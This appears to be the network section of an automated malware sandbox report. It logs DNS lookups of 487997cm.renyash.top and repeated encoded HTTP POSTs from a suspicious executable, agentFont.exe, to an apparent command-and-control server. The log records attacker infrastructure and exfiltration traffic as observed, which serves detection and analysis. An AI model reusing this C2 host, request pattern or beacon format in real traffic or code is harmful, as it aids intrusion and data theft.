                                                                                  Jan 1, 2025 11:29:19.389683962 CET8050163185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:19.517066956 CET8050161185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:19.517108917 CET5016180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:19.612965107 CET5016280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.705137968 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.705800056 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710203886 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.710243940 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710570097 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.710617065 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710746050 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.715502024 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.065377951 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.070303917 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.347246885 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.424726009 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.476834059 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.534106970 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.591396093 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.591396093 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.597188950 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.597309113 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.599771976 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.599772930 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.599910975 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.605619907 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.956042051 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.961292028 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.257101059 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.363800049 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.390156031 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.513772011 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.514352083 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519414902 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.519468069 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519557953 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519615889 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.519655943 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.524255991 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.877949953 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.882924080 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.161884069 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.237230062 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.290831089 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.368403912 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.407649994 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.408260107 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.412739038 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.412801981 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.413054943 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.413104057 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.413214922 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.417901039 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.659902096 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.659904957 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.664803028 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.667906046 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.668013096 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.672854900 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.707479000 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.779699087 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.784548044 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.784771919 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.784905910 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.789701939 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.879858971 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.880215883 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.019846916 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.024729967 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.024872065 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.143510103 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.148413897 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.305181026 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.425257921 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.434158087 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.434519053 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.534117937 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.554840088 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.662946939 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698014975 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698071003 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698807955 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703066111 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703114986 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703428984 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703460932 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703583956 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703639030 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703766108 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.708571911 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.049782991 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.054866076 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.361069918 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.494369984 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.494417906 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.607211113 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.607220888 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612088919 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.612287045 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.612375975 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612380028 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612529039 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.617314100 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.973990917 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.978996992 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.249340057 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.378129959 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.379291058 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.497653961 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.498399019 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.502651930 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.502770901 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.503223896 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.503339052 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.503443956 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.508212090 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:40.149847031 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:40.221637964 CET5019080192.168.2.4185.158.202.52
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 11:27:17.480875015 CET | 64177 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 11:27:17.835668087 CET | 53 | 64177 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 11:27:30.223342896 CET | 57017 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 11:27:30.421983004 CET | 53 | 57017 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 11:27:17.480875015 CET | 192.168.2.4 | 1.1.1.1 | 0x5d4d | Standard query (0) | 487997cm.renyash.top | A (IP address) | IN (0x0001) | false
Jan 1, 2025 11:27:30.223342896 CET | 192.168.2.4 | 1.1.1.1 | 0x5089 | Standard query (0) | 487997cm.renyash.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 11:27:17.835668087 CET | 1.1.1.1 | 192.168.2.4 | 0x5d4d | No error (0) | 487997cm.renyash.top | | 185.158.202.52 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 11:27:30.421983004 CET | 1.1.1.1 | 192.168.2.4 | 0x5089 | No error (0) | 487997cm.renyash.top | | 185.158.202.52 | A (IP address) | IN (0x0001) | false
                                                                                  • 487997cm.renyash.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:17.912916899 CET | 325 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 11:27:18.269238949 CET | 344 | OUT | Data Raw (POST body)
Jan 1, 2025 11:27:18.580063105 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:18.660109043 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:27:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1324
Connection: keep-alive
Jan 1, 2025 11:27:18.660123110 CET | 245 | IN | Data Raw (response body, continued)
Jan 1, 2025 11:27:18.707556009 CET | 301 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 384
Expect: 100-continue
Jan 1, 2025 11:27:18.897784948 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:18.898020983 CET | 384 | OUT | Data Raw (POST body)
Jan 1, 2025 11:27:19.155848026 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:27:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Jan 1, 2025 11:27:19.178271055 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1340
Expect: 100-continue
Jan 1, 2025 11:27:19.368738890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:19.368920088 CET | 1340 | OUT | Data Raw (POST body)
Jan 1, 2025 11:27:19.633815050 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Jan 2025 10:27:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  1 | 192.168.2.4 | 49738 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:19.040397882 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:19.393244982 CET | 1044 | OUT | Data Raw: 51 55 58 5b 54 41 55 5b 59 5f 5b 52 5a 5e 59 54 55 54 54 59 51 5f 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX[TAU[Y_[RZ^YTUTTYQ_[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(#'2>971?"Y%<6^6%&3?)73\#.9_<:&X"#\.8
                                                                                  Jan 1, 2025 11:27:19.681232929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:19.810910940 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  2 | 192.168.2.4 | 49739 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:19.993756056 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:20.347240925 CET | 1044 | OUT | Data Raw: 54 5a 58 5f 54 46 55 5d 59 5f 5b 52 5a 5d 59 52 55 5e 54 50 51 5a 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZX_TFU]Y_[RZ]YRU^TPQZ[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[)!!S 1-B.=+U%]3&^!&1P3)R>4,!%X)*&X"#\.
                                                                                  Jan 1, 2025 11:27:20.634182930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:20.766663074 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  3 | 192.168.2.4 | 49740 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:20.909374952 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:21.268426895 CET | 1044 | OUT | Data Raw: 54 54 5d 5e 51 47 50 5e 59 5f 5b 52 5a 5c 59 51 55 50 54 5a 51 50 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]^QGP^Y_[RZ\YQUPTZQP[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<"%"-<2:[,&0<)!&-V0,1R+78#>%(:&X"#\.0
                                                                                  Jan 1, 2025 11:27:21.554799080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:21.698190928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.4 | 49741 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:21.821182966 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:22.174674034 CET | 1044 | OUT | Data Raw: 54 5b 5d 5d 54 44 50 59 59 5f 5b 52 5a 5c 59 53 55 57 54 5b 51 5f 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]]TDPYY_[RZ\YSUWT[Q_[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-)""-(Y1-9.$1/0/5"5%'=B3!9X+&X"#\.0
                                                                                  Jan 1, 2025 11:27:22.477868080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:22.610064030 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.4 | 49742 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:22.742516041 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:23.166023970 CET | 1044 | OUT | Data Raw: 54 56 5d 59 51 44 50 5e 59 5f 5b 52 5a 59 59 53 55 57 54 51 51 5e 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]YQDP^Y_[RZYYSUWTQQ^[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?=U4&.5:&X0<[6V%?1S=B,5*(&X"#\.$
                                                                                  Jan 1, 2025 11:27:23.383116961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:23.514810085 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.4 | 49743 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:23.652899027 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:24.002677917 CET | 1044 | OUT | Data Raw: 54 53 58 5f 51 44 55 5a 59 5f 5b 52 5a 58 59 5c 55 57 54 58 51 58 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX_QDUZY_[RZXY\UWTXQX[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(5# &"B9=+W1>^',-6-V%,5Q=$"(*&X"#\.
                                                                                  Jan 1, 2025 11:27:24.298578024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:24.428020000 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.4 | 49744 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:24.556586981 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:24.909034014 CET | 1044 | OUT | Data Raw: 51 52 58 5e 51 40 55 5b 59 5f 5b 52 5a 58 59 5d 55 57 54 58 51 58 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
